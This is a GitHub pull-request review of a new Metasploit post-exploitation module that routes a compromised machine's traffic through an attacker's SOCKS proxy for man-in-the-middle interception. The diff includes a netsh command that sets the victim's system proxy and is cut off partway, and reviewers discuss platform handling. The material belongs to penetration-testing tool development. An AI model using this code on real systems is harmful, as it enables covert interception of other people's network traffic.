modules/post/multi/manage/local_mitm.rb

```diff
@@ -0,0 +1,41 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+
+  def initialize(info={})
+    super(update_info(info,
+        'Name'          => 'Free DonutZ', # GSOC 2018: module to get free modules
+        'Description'   => %q{
+          This module setup a local proxy on the victim computer so you can MITM it.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Eliott Teissonniere' ],
+        'Platform'      => [ 'win', 'linux' ],
+        'SessionTypes'  => [ 'meterpreter', 'shell' ]
+    ))
+
+    register_options(
+      [
+        OptString.new('RHOST', [true, 'Host of the socks proxy server']),
+        OptString.new('RPORT', [true, 'Port of the socks proxy server'])
+      ])
+  end
+
+  def run
+    if session.platform == 'windows'
+      print_status('Windows detected, using netsh')
+      vprint_status cmd_exec("netsh winhttp set proxy proxy-server=\"socks=#{datastore["RHOST"]}:#{datastore["RPORT"]}\" bypass-list=\"<local>\"")
+    else
```

Comment:
Should we check `session.platform` instead of assuming everything that is not windows is linux?

Reply:
I think but ain't sure that MSF will check the platform matches the ones specified in the initial configuration of the module, otherwise it doesn't really makes sense to specify platforms there, would have to check

Reply:
MSF will check and warn you, but it won't stop you. For every session type you list in `SessionTypes`, you should have a clear code path for it in your module.

Reply:
Got it, will push some new commits in a few minutes

Reply:
#7888 and #7737, for reference.

Reply:
#7736 for reference.